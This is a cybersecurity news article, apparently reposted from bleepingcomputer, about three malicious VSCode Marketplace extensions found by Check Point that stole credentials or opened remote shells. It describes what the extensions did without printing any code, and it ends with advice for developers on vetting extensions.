The Alarming Rise of Malicious Extensions in Microsoft’s VSCode Marketplace
The Alarming Rise of Malicious Extensions in Microsoft’s VSCode Marketplace
Cybercriminals Target Microsoft’s VSCode Marketplace
Cybercriminals have set their sights on Microsoft’s esteemed VSCode Marketplace, launching a series of insidious attacks by uploading three malicious Visual Studio extensions. Shockingly, these nefarious extensions managed to accumulate a staggering 46,600 downloads by unsuspecting Windows developers. The consequences of this breach, discovered by the diligent analysts at Check Point, are severe, as the malware embedded within the extensions enabled threat actors to pilfer vital credentials, exploit system vulnerabilities, and even establish a remote shell on victims’ machines.
Upon unearthing the malicious extensions, Check Point promptly alerted Microsoft, leading to their removal from the VSCode Marketplace on May 14, 2023, just ten days after the initial discovery on May 4. However, the aftermath of this cyberattack demands immediate action from developers who unwittingly installed these extensions. They must manually eliminate the malicious software from their systems and conduct thorough scans to detect any residual traces of infection.
The malicious extensions, exposed by Check Point researchers, shed light on the extent of the infiltration within the VSCode Marketplace. The most widespread among them was the deceptively named ‘Theme Darcula dark.’ Initially presented as an innocent enhancement for the Dracula color scheme on VS Code, this extension cunningly collected essential system information from developers, including hostname, operating system details, CPU platform specifications, total memory, and CPU information. Although devoid of overtly malicious activities, this unconventional behavior for a theme pack raised red flags. Astonishingly, ‘Theme Darcula dark’ amassed over 45,000 downloads, making it the most circulated extension in this illicit campaign.
Darcula extension on the VSCode Marketplace (Check Point)
Another malicious extension, ‘python-vscode,’ attracted attention despite its enigmatic description and uploaded by an account named ‘testUseracc1111.’ With 1,384 downloads, this seemingly innocuous extension concealed a perilous secret. Further analysis uncovered its true nature as a C# shell injector, capable of executing arbitrary code or commands on compromised machines, effectively granting unauthorized control to threat actors.
Obfuscated C# code injector (Check Point)
See Also: So you want to be a hacker?
Offensive Security, Bug Bounty Courses
Similarly, the extension named ‘prettiest java,’ mimicking the popular code formatting tool ‘prettier-java,’ deceived 278 unsuspecting users. Beneath its façade, this extension engaged in the malicious act of stealing saved credentials and authentication tokens from Discord, Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser. The stolen information was surreptitiously transmitted to the attackers via a Discord webhook, enabling them to exploit compromised accounts for their malicious purposes.
Searching for local secrets (Check Point)
In addition to the identified malicious extensions, Check Point also discovered numerous suspicious extensions exhibiting unsafe behaviors, such as unauthorized access to code from private repositories or downloading files without proper authorization. While these extensions could not be definitively classified as malicious, their actions raised concerns about potential security risks, emphasizing the need for heightened vigilance within software development environments.
This incident underscores the inherent risks associated with user-supported repositories, exemplified by the VSCode Marketplace. While software repositories that allow user contributions, such as NPM and PyPi, have long been targeted by threat actors, the VSCode Marketplace is now experiencing a similar onslaught. A previous demonstration by AquaSec in January revealed the ease with which malicious extensions could be uploaded to the VSCode Marketplace, presenting a series of highly suspicious cases. Although no malware was found during AquaSec’s investigation, the recent discoveries by Check Point substantiate the emergence of a disturbing trend. Threat actors are actively seeking to infect Windows developers by infiltrating reputable software repositories, mirroring their strategies in repositories like NPM and PyPI.
Trending: OSINT Tool: GooFuzz
Secure Coding Practices
As a precautionary measure, all users of the VSCode Marketplace, as well as other user-supported repositories, are strongly advised to exercise utmost caution. Only install extensions from trustworthy publishers with significant downloads and positive community ratings. Engage in diligent research by reading user reviews to gauge the reliability and safety of extensions. Most importantly, it is imperative to conduct a thorough inspection of an extension’s source code before installation, ensuring transparency and mitigating potential security risks.
In a digital landscape fraught with evolving threats, the security and well-being of developers and their projects hinge on their ability to remain steadfast, proactive, and informed. By adopting stringent security practices and cultivating a culture of attentiveness, the software development community can fortify its defenses against malicious infiltrations and forge a safer environment for innovation and collaboration.
Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
Source: bleepingcomputer.com
The post The Alarming Rise of Malicious Extensions in Microsoft’s VSCode Marketplace first appeared on Black Hat Ethical Hacking.
About The Author
